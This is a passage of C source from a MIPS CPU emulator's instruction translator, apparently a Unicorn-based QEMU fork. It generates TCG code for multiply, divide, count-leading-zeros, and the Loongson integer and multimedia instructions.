tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_LO[acc]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], tcg_ctx->cpu_HI[acc]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case OPC_DIVU: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_divu_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t0, t1); tcg_gen_remu_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_LO[acc]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], tcg_ctx->cpu_HI[acc]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case OPC_MULT: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_muls2_i32(tcg_ctx, t2, t3, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case OPC_MULTU: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_mulu2_i32(tcg_ctx, t2, t3, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; #if defined(TARGET_MIPS64) case OPC_DDIV: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, -1LL << 63); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1LL); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t0, t1); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t0, t1); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case OPC_DDIVU: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_divu_i64(tcg_ctx, tcg_ctx->cpu_LO[acc], t0, t1); tcg_gen_remu_i64(tcg_ctx, tcg_ctx->cpu_HI[acc], t0, t1); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case OPC_DMULT: tcg_gen_muls2_i64(tcg_ctx, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc], t0, t1); break; case OPC_DMULTU: tcg_gen_mulu2_i64(tcg_ctx, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc], t0, t1); break; #endif case OPC_MADD: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_add_i64(tcg_ctx, t2, t2, t3); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case OPC_MADDU: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_add_i64(tcg_ctx, t2, t2, t3); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case OPC_MSUB: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_sub_i64(tcg_ctx, t2, t3, t2); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; case OPC_MSUBU: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_sub_i64(tcg_ctx, t2, t3, t2); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); tcg_temp_free_i64(tcg_ctx, t2); } break; default: MIPS_INVAL("mul/div"); generate_exception_end(ctx, EXCP_RI); goto out; } out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* * These MULT[U] and MADD[U] instructions implemented in for example * the Toshiba/Sony R5900 and the Toshiba TX19, TX39 and TX79 core * architectures are special three-operand variants with the syntax * * MULT[U][1] rd, rs, rt * * such that * * (rd, LO, HI) <- rs * rt * * and * * MADD[U][1] rd, rs, rt * * such that * * (rd, LO, HI) <- (LO, HI) + rs * rt * * where the low-order 32-bits of the result is placed into both the * GPR rd and the special register LO. The high-order 32-bits of the * result is placed into the special register HI. * * If the GPR rd is omitted in assembly language, it is taken to be 0, * which is the zero register that always reads as 0. */ static void gen_mul_txx9(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); int acc = 0; gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case MMI_OPC_MULT1: acc = 1; /* Fall through */ case OPC_MULT: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_muls2_i32(tcg_ctx, t2, t3, t2, t3); if (rd) { tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); } tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case MMI_OPC_MULTU1: acc = 1; /* Fall through */ case OPC_MULTU: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_mulu2_i32(tcg_ctx, t2, t3, t2, t3); if (rd) { tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); } tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case MMI_OPC_MADD1: acc = 1; /* Fall through */ case MMI_OPC_MADD: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_tl_i64(tcg_ctx, t2, t0); tcg_gen_ext_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_add_i64(tcg_ctx, t2, t2, t3); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); if (rd) { gen_move_low32(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); } tcg_temp_free_i64(tcg_ctx, t2); } break; case MMI_OPC_MADDU1: acc = 1; /* Fall through */ case MMI_OPC_MADDU: { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_extu_tl_i64(tcg_ctx, t2, t0); tcg_gen_extu_tl_i64(tcg_ctx, t3, t1); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_concat_tl_i64(tcg_ctx, t3, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc]); tcg_gen_add_i64(tcg_ctx, t2, t2, t3); tcg_temp_free_i64(tcg_ctx, t3); gen_move_low32(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); gen_move_high32(tcg_ctx, tcg_ctx->cpu_HI[acc], t2); if (rd) { gen_move_low32(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); } tcg_temp_free_i64(tcg_ctx, t2); } break; default: MIPS_INVAL("mul/madd TXx9"); generate_exception_end(ctx, EXCP_RI); goto out; } out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_mul_vr54xx(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case OPC_VR54XX_MULS: gen_helper_muls(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MULSU: gen_helper_mulsu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MACC: gen_helper_macc(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MACCU: gen_helper_maccu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MSAC: gen_helper_msac(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MSACU: gen_helper_msacu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MULHI: gen_helper_mulhi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MULHIU: gen_helper_mulhiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MULSHI: gen_helper_mulshi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MULSHIU: gen_helper_mulshiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MACCHI: gen_helper_macchi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MACCHIU: gen_helper_macchiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MSACHI: gen_helper_msachi(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; case OPC_VR54XX_MSACHIU: gen_helper_msachiu(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); break; default: MIPS_INVAL("mul vr54xx"); generate_exception_end(ctx, EXCP_RI); goto out; } gen_store_gpr(tcg_ctx, t0, rd); out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_cl(DisasContext *ctx, uint32_t opc, int rd, int rs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (rd == 0) { /* Treat as NOP. */ return; } t0 = tcg_ctx->cpu_gpr[rd]; gen_load_gpr(tcg_ctx, t0, rs); switch (opc) { case OPC_CLO: case R6_OPC_CLO: #if defined(TARGET_MIPS64) case OPC_DCLO: case R6_OPC_DCLO: #endif tcg_gen_not_tl(tcg_ctx, t0, t0); break; } switch (opc) { case OPC_CLO: case R6_OPC_CLO: case OPC_CLZ: case R6_OPC_CLZ: tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_clzi_tl(tcg_ctx, t0, t0, TARGET_LONG_BITS); tcg_gen_subi_tl(tcg_ctx, t0, t0, TARGET_LONG_BITS - 32); break; #if defined(TARGET_MIPS64) case OPC_DCLO: case R6_OPC_DCLO: case OPC_DCLZ: case R6_OPC_DCLZ: tcg_gen_clzi_i64(tcg_ctx, t0, t0, 64); break; #endif } } /* Godson integer instructions */ static void gen_loongson_integer(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; if (rd == 0) { /* Treat as NOP. */ return; } switch (opc) { case OPC_MULT_G_2E: case OPC_MULT_G_2F: case OPC_MULTU_G_2E: case OPC_MULTU_G_2F: #if defined(TARGET_MIPS64) case OPC_DMULT_G_2E: case OPC_DMULT_G_2F: case OPC_DMULTU_G_2E: case OPC_DMULTU_G_2F: #endif t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); break; default: t0 = tcg_temp_local_new(tcg_ctx); t1 = tcg_temp_local_new(tcg_ctx); break; } gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case OPC_MULT_G_2E: case OPC_MULT_G_2F: tcg_gen_mul_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); break; case OPC_MULTU_G_2E: case OPC_MULTU_G_2F: tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_mul_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); break; case OPC_DIV_G_2E: case OPC_DIV_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGLabel *l3 = gen_new_label(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_ext32s_tl(tcg_ctx, t1, t1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l3); gen_set_label(tcg_ctx, l1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, INT_MIN, l2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1, l2); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); tcg_gen_br(tcg_ctx, l3); gen_set_label(tcg_ctx, l2); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); gen_set_label(tcg_ctx, l3); } break; case OPC_DIVU_G_2E: case OPC_DIVU_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_divu_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); gen_set_label(tcg_ctx, l2); } break; case OPC_MOD_G_2E: case OPC_MOD_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGLabel *l3 = gen_new_label(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, INT_MIN, l2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l3); gen_set_label(tcg_ctx, l2); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); gen_set_label(tcg_ctx, l3); } break; case OPC_MODU_G_2E: case OPC_MODU_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_remu_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); gen_set_label(tcg_ctx, l2); } break; #if defined(TARGET_MIPS64) case OPC_DMULT_G_2E: case OPC_DMULT_G_2F: tcg_gen_mul_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); break; case OPC_DMULTU_G_2E: case OPC_DMULTU_G_2F: tcg_gen_mul_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); break; case OPC_DDIV_G_2E: case OPC_DDIV_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGLabel *l3 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l3); gen_set_label(tcg_ctx, l1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, -1LL << 63, l2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1LL, l2); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); tcg_gen_br(tcg_ctx, l3); gen_set_label(tcg_ctx, l2); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); gen_set_label(tcg_ctx, l3); } break; case OPC_DDIVU_G_2E: case OPC_DDIVU_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_divu_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); gen_set_label(tcg_ctx, l2); } break; case OPC_DMOD_G_2E: case OPC_DMOD_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGLabel *l3 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, -1LL << 63, l2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, -1LL, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l3); gen_set_label(tcg_ctx, l2); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); gen_set_label(tcg_ctx, l3); } break; case OPC_DMODU_G_2E: case OPC_DMODU_G_2F: { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_remu_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); gen_set_label(tcg_ctx, l2); } break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* Loongson multimedia instructions */ static void gen_loongson_multimedia(DisasContext *ctx, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t opc, shift_max; TCGv_i64 t0, t1; TCGCond cond; opc = MASK_LMI(ctx->opcode); switch (opc) { case OPC_ADD_CP2: case OPC_SUB_CP2: case OPC_DADD_CP2: case OPC_DSUB_CP2: t0 = tcg_temp_local_new_i64(tcg_ctx); t1 = tcg_temp_local_new_i64(tcg_ctx); break; default: t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); break; } check_cp1_enabled(ctx); gen_load_fpr64(ctx, t0, rs); gen_load_fpr64(ctx, t1, rt); switch (opc) { case OPC_PADDSH: gen_helper_paddsh(tcg_ctx, t0, t0, t1); break; case OPC_PADDUSH: gen_helper_paddush(tcg_ctx, t0, t0, t1); break; case OPC_PADDH: gen_helper_paddh(tcg_ctx, t0, t0, t1); break; case OPC_PADDW: gen_helper_paddw(tcg_ctx, t0, t0, t1); break; case OPC_PADDSB: gen_helper_paddsb(tcg_ctx, t0, t0, t1); break; case OPC_PADDUSB: gen_helper_paddusb(tcg_ctx, t0, t0, t1); break; case OPC_PADDB: gen_helper_paddb(tcg_ctx, t0, t0, t1); break; case OPC_PSUBSH: gen_helper_psubsh(tcg_ctx, t0, t0, t1); break; case OPC_PSUBUSH: gen_helper_psubush(tcg_ctx, t0, t0, t1); break; case OPC_PSUBH: gen_helper_psubh(tcg_ctx, t0, t0, t1); break; case OPC_PSUBW: gen_helper_psubw(tcg_ctx, t0, t0, t1); break; case OPC_PSUBSB: gen_helper_psubsb(tcg_ctx, t0, t0, t1); break; case OPC_PSUBUSB: gen_helper_psubusb(tcg_ctx, t0, t0, t1); break; case OPC_PSUBB: gen_helper_psubb(tcg_ctx, t0, t0, t1); break; case OPC_PSHUFH: gen_helper_pshufh(tcg_ctx, t0, t0, t1); break; case OPC_PACKSSWH: gen_helper_packsswh(tcg_ctx, t0, t0, t1); break; case OPC_PACKSSHB: gen_helper_packsshb(tcg_ctx, t0, t0, t1); break; case OPC_PACKUSHB: gen_helper_packushb(tcg_ctx, t0, t0, t1); break; case OPC_PUNPCKLHW: gen_helper_punpcklhw(tcg_ctx, t0, t0, t1); break; case OPC_PUNPCKHHW: gen_helper_punpckhhw(tcg_ctx, t0, t0, t1); break; case OPC_PUNPCKLBH: gen_helper_punpcklbh(tcg_ctx, t0, t0, t1); break; case OPC_PUNPCKHBH: gen_helper_punpckhbh(tcg_ctx, t0, t0, t1); break; case OPC_PUNPCKLWD: gen_helper_punpcklwd(tcg_ctx, t0, t0, t1); break; case OPC_PUNPCKHWD: gen_helper_punpckhwd(tcg_ctx, t0, t0, t1); break; case OPC_PAVGH: gen_helper_pavgh(tcg_ctx, t0, t0, t1); break; case OPC_PAVGB: gen_helper_pavgb(tcg_ctx, t0, t0, t1); break; case OPC_PMAXSH: gen_helper_pmaxsh(tcg_ctx, t0, t0, t1); break; case OPC_PMINSH: gen_helper_pminsh(tcg_ctx, t0, t0, t1); break; case OPC_PMAXUB: gen_helper_pmaxub(tcg_ctx, t0, t0, t1); break; case OPC_PMINUB: gen_helper_pminub(tcg_ctx, t0, t0, t1); break; case OPC_PCMPEQW: gen_helper_pcmpeqw(tcg_ctx, t0, t0, t1); break; case OPC_PCMPGTW: gen_helper_pcmpgtw(tcg_ctx, t0, t0, t1); break; case OPC_PCMPEQH: gen_helper_pcmpeqh(tcg_ctx, t0, t0, t1); break; case OPC_PCMPGTH: gen_helper_pcmpgth(tcg_ctx, t0, t0, t1); break; case OPC_PCMPEQB: gen_helper_pcmpeqb(tcg_ctx, t0, t0, t1); break; case OPC_PCMPGTB: gen_helper_pcmpgtb(tcg_ctx, t0, t0, t1); break; case OPC_PSLLW: gen_helper_psllw(tcg_ctx, t0, t0, t1); break; case OPC_PSLLH: gen_helper_psllh(tcg_ctx, t0, t0, t1); break; case OPC_PSRLW: gen_helper_psrlw(tcg_ctx, t0, t0, t1); break; case OPC_PSRLH: gen_helper_psrlh(tcg_ctx, t0, t0, t1); break; case OPC_PSRAW: gen_helper_psraw(tcg_ctx, t0, t0, t1); break; case OPC_PSRAH: gen_helper_psrah(tcg_ctx, t0, t0, t1); break; case OPC_PMULLH: gen_helper_pmullh(tcg_ctx, t0, t0, t1); break; case OPC_PMULHH: gen_helper_pmulhh(tcg_ctx, t0, t0, t1); break; case OPC_PMULHUH: gen_helper_pmulhuh(tcg_ctx, t0, t0, t1); break; case OPC_PMADDHW: gen_helper_pmaddhw(tcg_ctx, t0, t0, t1); break; case OPC_PASUBUB: gen_helper_pasubub(tcg_ctx, t0, t0, t1); break; case OPC_BIADD: gen_helper_biadd(tcg_ctx, t0, t0); break; case OPC_PMOVMSKB: gen_helper_pmovmskb(tcg_ctx, t0, t0); break; case OPC_PADDD: tcg_gen_add_i64(tcg_ctx, t0, t0, t1); break; case OPC_PSUBD: tcg_gen_sub_i64(tcg_ctx, t0, t0, t1); break; case OPC_XOR_CP2: tcg_gen_xor_i64(tcg_ctx, t0, t0, t1); break; case OPC_NOR_CP2: tcg_gen_nor_i64(tcg_ctx, t0, t0, t1); break; case OPC_AND_CP2: tcg_gen_and_i64(tcg_ctx, t0, t0, t1); break; case OPC_OR_CP2: tcg_gen_or_i64(tcg_ctx, t0, t0, t1); break; case OPC_PANDN: tcg_gen_andc_i64(tcg_ctx, t0, t1, t0); break; case OPC_PINSRH_0: tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 0, 16); break; case OPC_PINSRH_1: tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 16, 16); break; case OPC_PINSRH_2: tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 32, 16); break; case OPC_PINSRH_3: tcg_gen_deposit_i64(tcg_ctx, t0, t0, t1, 48, 